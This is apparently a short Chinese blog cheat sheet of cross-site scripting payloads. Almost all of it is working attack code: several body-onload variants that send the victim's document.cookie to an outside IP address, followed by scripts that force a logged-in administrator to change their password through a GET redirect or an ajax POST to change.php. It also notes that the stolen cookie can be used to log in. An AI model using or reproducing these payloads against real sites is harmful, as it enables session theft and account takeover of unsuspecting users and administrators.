XSS之常用姿勢
阿新 • • 發佈:2022-04-18
body標籤
<body onload='load();'>
</body>
JS語句內呼叫
<script>
window.onload = ...;
</script>
常用方式
# 當前頁面開啟新頁面 <body onload="window.location.href='http://101.35.221.145/?cookie=' + document.cookie"></body> # 當前頁面開啟新頁面 <body onload="document.location.href='http://101.35.221.145/?cookie=' + document.cookie"></body> # 父頁面開啟新頁面 <body onload="parent.location.href='http://101.35.221.145/?cookie=' + document.cookie"></body> # 頂層頁面開啟新頁面 <body onload="top.location.href='http://101.35.221.145/?cookie=' + document.cookie"></body> # 當前頁面開啟新頁面 <body onload="this.location.href='http://101.35.221.145/?cookie=' + document.cookie"></body> # 當前頁面開啟新頁面 <body onload="self.location.href='http://101.35.221.145/?cookie=' + document.cookie"></body> <script>window.location.href='xxx' + document.cookie</script>
利用方法
拿cookie登入
令管理員自己修改密碼
<script>window.location.href='http://127.0.0.1/api/change.php?p=dddddd';</script>
<script>$.ajax({url:'api/change.php',type:'post',data:{p:'123'}});</script>